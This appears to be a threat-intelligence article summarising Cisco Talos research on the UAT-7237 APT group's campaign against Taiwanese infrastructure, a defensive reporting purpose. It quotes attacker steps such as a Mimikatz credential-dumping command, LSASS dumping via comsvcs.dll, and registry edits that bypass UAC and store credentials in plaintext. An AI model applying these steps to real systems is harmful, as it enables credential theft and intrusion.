UAT-7237 Targets Taiwan with Webshells, VPN Abuse, and Credential Theft

A Chinese-speaking APT group Cisco Talos tracks as UAT-7237 has initiated campaigns targeting Taiwan’s web infrastructure to secure long-term access. This APT group has been active since at least 2022, with attribution placing it under a larger umbrella group based on overlaps. According to Cisco Talos, “UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors,” though its tactics and preferences set it apart. Unlike UAT-5918, which favors Meterpreter and heavy webshell usage, UAT-7237 centers on Cobalt Strike, deploys webshells selectively, and prefers RDP with SoftEther for persistent access. Cisco Talos observed that the group primarily uses open-source utilities alongside a custom loader called “SoundBill,” which allows them to decode and run shellcode payloads, including credential theft modules and remote access implants. Talos further noted that “the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure,” reinforcing their intent to establish long-term persistence in critical environments.

The group achieves initial access by scanning for vulnerable public-facing servers, exploiting exposed services, and quickly assessing the target’s value through native Windows commands such as "nslookup," "systeminfo," "ping," "curl," and "ipconfig," executed with "cmd /c." The threat actors often deploy the SoftEther VPN client by downloading RAR archives into the "Temp" directory through CMD or PowerShell. Reconnaissance and lateral movement are enabled by tools like FScan and SMB scanners, with mapping of network shares such as "C$" and identification of domain admins and domain controllers. They also leverage WMIC remote queries with admin credentials to execute commands, such as "whoami" checks and "netstat -ano >c:\1.txt" to monitor network connections.

For privilege escalation and deeper system access, UAT-7237 deploys the SoundBill loader, which is capable of executing payloads including Mimikatz with commands such as "privilege::debug sekurlsa::logonpasswords." SoundBill also enables execution of arbitrary commands and, in some cases, facilitates Cobalt Strike payload delivery. The group uses JuicyPotato to elevate privileges and often manipulates registry keys, such as modifying "LocalAccountTokenFilterPolicy" to bypass UAC restrictions and "WDigest" to store credentials in plaintext. Additional evasive measures include the use of “.msc” management console files to adjust permissions and blend malicious actions into administrative workflows.

Credential theft and persistence remain central to UAT-7237’s operations. In addition to SoundBill’s built-in credential extraction features, they employ "comsvcs.dll" for LSASS dumping, custom builds of Mimikatz, and open-source tools like "ssp_dump_lsass" to extract authentication data. They actively search for VNC passwords in registry paths such as "HKCU\Software\ORL\WinVNC3\Password" and .ini files across disk. Exfiltrated data is compressed using utilities like "7z.exe," staging dumps into archives before removal. Their network proliferation leverages FScan for subnet sweeps and SMB service scans to pivot laterally, while previously stolen credentials are used to connect, enumerate, and clean up access paths across victim systems. Cisco Talos assessed that UAT-7237 has sustained use of SoftEther VPN infrastructure since at least 2022, with the client language files specifying Simplified Chinese, further linking the operators to Chinese-speaking threat actor ecosystems.